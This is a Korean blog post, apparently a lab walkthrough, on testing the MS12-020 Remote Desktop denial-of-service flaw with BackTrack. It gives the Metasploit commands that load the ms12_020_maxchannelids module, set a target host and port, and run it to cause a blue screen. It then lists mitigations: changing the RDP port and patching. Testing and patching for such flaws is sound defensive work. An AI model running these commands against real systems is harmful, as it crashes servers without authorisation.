336x280(권장), 300x250(권장), 250x250, 200x200 크기의 광고 코드만 넣을 수 있습니다.

[BSOD] BackTrack을 이용한 RDP 취약점 테스트 / MS12-020 Microsoft Remote Desktop Use-After-Free DoS

 

 

 

 

 

원격 데스크톱의 취약점으로 인한 원격 코드 실행 문제점을 BackTrack을 통해 테스트 해보려고 합니다.

 

 

아래 취약점 코드가 실행될 경우 BSOD(Blue Screen of Deatch)가 실행됩니다.

 

 

 

 

 

참고 URL :

http://technet.microsoft.com/ko-kr/security/bulletin/ms12-020

http://www.exploit-db.com/exploits/18606/

 

 

 

 

 

# 테스트 방법

 

 

1. msfconsole 실행

 

 

 

 

 

2. msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

 

 

 

 

 

 

3. msf  auxiliary(ms12_020_maxchannelids) > set rhost 192.168.10.248          // Target IP 설정

msf  auxiliary(ms12_020_maxchannelids) > set rport 3387          // 원격데스크탑 port 설

 

 

 

 

 

 

4. exploit

 

 

 

 

 

테스트 시 Target의 BSOD는 실패하였지만 다른 시스템에 테스트하였을 시 아래와 같은 블루스크린을 확인할 수 있었습니다.

 

 

 

 

 

 

 

# 대응방법

 

1. 서버의 원격데스크톱 포트를 3389에서 다른 포트로 변경하여 공격 시도를 줄입니다.

원격데스크톱 포트 변경 방법 : http://tisiphone.tistory.com/11

 

 

2. 윈도우 보안 업데이트를 합니다.

+ Recent posts